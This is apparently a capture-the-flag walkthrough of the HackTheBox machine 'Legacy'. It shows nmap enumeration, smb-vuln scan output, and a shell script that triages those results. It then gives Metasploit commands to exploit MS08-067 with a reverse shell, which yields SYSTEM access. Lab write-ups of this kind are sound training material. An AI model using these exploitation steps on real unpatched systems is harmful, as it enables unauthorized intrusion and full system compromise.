Enumeration
Nmap the target machine
nmap -sC -sV 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up (0.18s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
1023/tcp filtered netvenuechat
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:a2:78 (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2024-04-21T12:06:17+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h27m38s, deviation: 2h07m16s, median: 4d22h57m38s
Ports 139 and 445 are open, so the SMB service is the target.
I tried to enumerate SMB users and shares with several tools, such as smbclient, smbmap, and rpcclient, but could not get any useful information.
I managed to log in anonymously (a null session), but the permissions did not allow me to enumerate anything.
So I tried the Nmap smb-vuln scripts to look for known vulnerabilities.
nmap --script=smb-vuln* 10.10.10.4 -sC -p 445,139
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 04:14 EDT
Nmap scan report for 10.10.10.4
Host is up (0.18s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
Then, yes! The scan confirms the host is Windows XP (SMB reports it as "Windows 2000 LAN Manager", the 2000/XP-era SMBv1 stack).
The vulnerability scripts also report that it is vulnerable to both MS17-010 (CVE-2017-0143) and MS08-067 (CVE-2008-4250). I went with MS08-067.
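As an added example (not part of the original write-up), the POSIX shell script below triages the host-script section of an `nmap --script=smb-vuln*` run: for every smb-vuln script it reports whether the host came back VULNERABLE, NOT_VULNERABLE, ERROR, or UNKNOWN, and pulls out the CVE IDs. The sample input is a trimmed copy of the scan output above, constructed inline so the script runs offline; the function names are my own.

```shell
#!/bin/sh
# Added example: triage the host-script section of an `nmap --script=smb-vuln*` run.
# In practice feed it the saved scan (e.g. `nmap -oN scan.txt ...`); the sample below is a
# trimmed, constructed copy of the Legacy scan so the script runs offline.
set -eu

SAMPLE_SCAN='Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false'

# smb_vuln_triage <nmap-text-output>
# Prints one line per smb-vuln-* script:
#   <script-name> <VULNERABLE|NOT_VULNERABLE|ERROR|UNKNOWN> [CVE-... ...]
# A one-line result ("|_smb-vuln-xxx: false" / "... ERROR: ...") is classified from the
# header itself; multi-line results are classified from their "State:" line.
smb_vuln_triage() {
  printf '%s\n' "$1" | awk '
    function flush() {
      if (name != "") printf "%s %s%s\n", name, state, cves
      name = ""; state = "UNKNOWN"; cves = ""
    }
    # Script header: "| smb-vuln-xxx:" or "|_smb-vuln-xxx: <one-line result>"
    /^\|_? *smb-vuln-[A-Za-z0-9_-]+:/ {
      flush()
      line = $0
      sub(/^\|_? */, "", line)
      name = line; sub(/:.*/, "", name)           # text before the first colon
      rest = line; sub(/^[^:]*: */, "", rest)     # text after the first colon
      if (rest ~ /^false/)      state = "NOT_VULNERABLE"
      else if (rest ~ /^ERROR/) state = "ERROR"
      else                      state = "UNKNOWN"
      next
    }
    /State: VULNERABLE/     { state = "VULNERABLE" }
    /State: NOT VULNERABLE/ { state = "NOT_VULNERABLE" }
    /IDs:/ {
      n = split($0, parts, /[ \t,]+/)
      for (i = 1; i <= n; i++)
        if (parts[i] ~ /^CVE:/) cves = cves " " substr(parts[i], 5)
    }
    END { flush() }
  '
}

# vulnerable_only <nmap-text-output>: just the script names that reported VULNERABLE
vulnerable_only() {
  smb_vuln_triage "$1" | awk '$2 == "VULNERABLE" { print $1 }'
}

smb_vuln_triage "$SAMPLE_SCAN"
```

Run against the sample it lists ms17-010 and ms08-067 as VULNERABLE with their CVEs, ms10-061 as ERROR (the script failed, so that check is inconclusive rather than clean), and ms10-054 as NOT_VULNERABLE; `vulnerable_only` narrows that to the two exploitable findings.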
I launched Metasploit and searched for it.
msfconsole
search MS08-067
use exploit/windows/smb/ms08_067_netapi
The search returns the matching module.
Set RHOSTS to the target address (and LHOST to your VPN interface address so the reverse payload can connect back), then run it to get a shell.
user.txt
After getting the shell, I found the user john.
The user flag (user.txt) is on john's Desktop.
root.txt
The root flag (root.txt) is on the Administrator's Desktop.
No privilege escalation is needed: the Server service exploited by MS08-067 runs as SYSTEM, so the shell already has full access to the box.
That’s all for this machine.